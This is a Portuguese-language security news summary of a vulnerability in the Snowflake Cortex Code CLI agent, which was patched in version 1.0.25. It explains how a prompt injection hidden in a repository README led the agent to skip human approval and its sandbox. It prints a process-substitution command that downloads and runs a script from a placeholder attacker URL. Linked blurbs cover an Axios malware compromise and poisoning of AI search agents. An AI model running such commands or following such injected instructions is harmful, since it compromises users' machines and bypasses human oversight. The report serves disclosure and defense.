Vulnerabilidade no Snowflake Cortex Code CLI permitiu escape de sandbox e execução de malware

Detalhes da Vulnerabilidade
O Snowflake Cortex Code CLI é um agente de codificação de linha de comando que opera de forma semelhante ao Claude Code e ao Codex da OpenAI, com integração embutida para executar SQL no Snowflake. Dois dias após o lançamento, uma vulnerabilidade foi identificada no sistema de validação de comandos do Cortex Code que permitia que comandos maliciosos especialmente construídos executassem comandos arbitrários sem acionar as etapas de aprovação humana e executassem esses comandos fora do sandbox do Cortex CLI.
Cadeia de Ataque
O ataque funciona por meio de injeção de prompt indireta. Um usuário abre o Cortex e ativa o sandbox, depois pede ajuda ao Cortex com uma base de código de terceiros de código aberto. Uma injeção de prompt oculta no README de um repositório não confiável manipula o Cortex para acreditar que deve executar um comando perigoso.
O Cortex não conseguiu validar comandos dentro de expressões de substituição de processo, permitindo a execução não aprovada do comando malicioso:
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))Este comando baixa um script do servidor do atacante e o executa. O bypass funcionou porque:
- Comandos inseguros dentro de uma expressão de substituição de processo <() não foram avaliados pelo sistema de validação
- O comando completo começava com um comando 'seguro' (cat neste caso)
- Comandos em expressões de substituição de processo nunca acionavam aprovação humana
Bypass do Sandbox
A injeção de prompt também manipula o modelo para definir um sinalizador que aciona a execução de comandos fora do sandbox. O Cortex, por padrão, pode definir um sinalizador para acionar a execução de comandos fora do sandbox, e a injeção usa isso para permitir que o comando malicioso seja executado fora do sandbox.
Remediação
A equipe de segurança da Snowflake validou e remediou esta vulnerabilidade, lançando uma correção com a versão 1.0.25 do Cortex Code CLI em 28 de fevereiro de 2026. O aviso completo da Snowflake está disponível no Site da Comunidade Snowflake em: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response
Nota: Esta cadeia de ataque também se aplicava a usuários não sandbox. A documentação indica que no modo OS+Regular, todos os comandos solicitam aprovação do usuário. Comandos executados no sandbox também têm restrições de acesso à rede e ao sistema de arquivos.
📖 Leia a fonte completa: HN AI Agents
👀 See Also

Axios 1.14.1 comprometido com malware, mira fluxos de trabalho de desenvolvimento assistido por IA
A versão 1.14.1 do Axios foi comprometida em um ataque à cadeia de suprimentos que silenciosamente incorpora [email protected], um dropper de RAT ofuscado. Desenvolvedores que usam assistentes de codificação com IA, como o Claude, devem verificar imediatamente seus arquivos de bloqueio e máquinas em busca de infecção.

ClawGuard: Gateway de Segurança de Código Aberto para Proteção de Credenciais da API OpenClaw
ClawGuard é um gateway de segurança que fica entre agentes de IA e APIs externas, usando credenciais fictícias na máquina do agente enquanto armazena tokens reais separadamente. Ele fornece aprovação via Telegram para chamadas sensíveis e mantém um registro de auditoria de solicitações.

Aviso de Segurança: Script ClawProxy Roubou Chaves de API, Resultando em Conta Significativa na OpenRouter
Um desenvolvedor instalou um script ClawProxy de código fechado de um usuário do Reddit em um sistema Ubuntu 24.04 WSL isolado, que roubou sua chave de API do OpenRouter e a usou via API do Google Vertex para gerar uma conta alta no Opus 4.6 durante a noite.

13 palavras no Reddit podem manipular a busca de IA: Pesquisa de Cornell
A pesquisa da Cornell mostra que um trecho de 13 palavras no Reddit ou Wikipedia pode envenenar agentes de busca de IA. Metade de todas as citações de IA vêm de sites UGC, tornando trivial para marcas injetarem conteúdo promocional.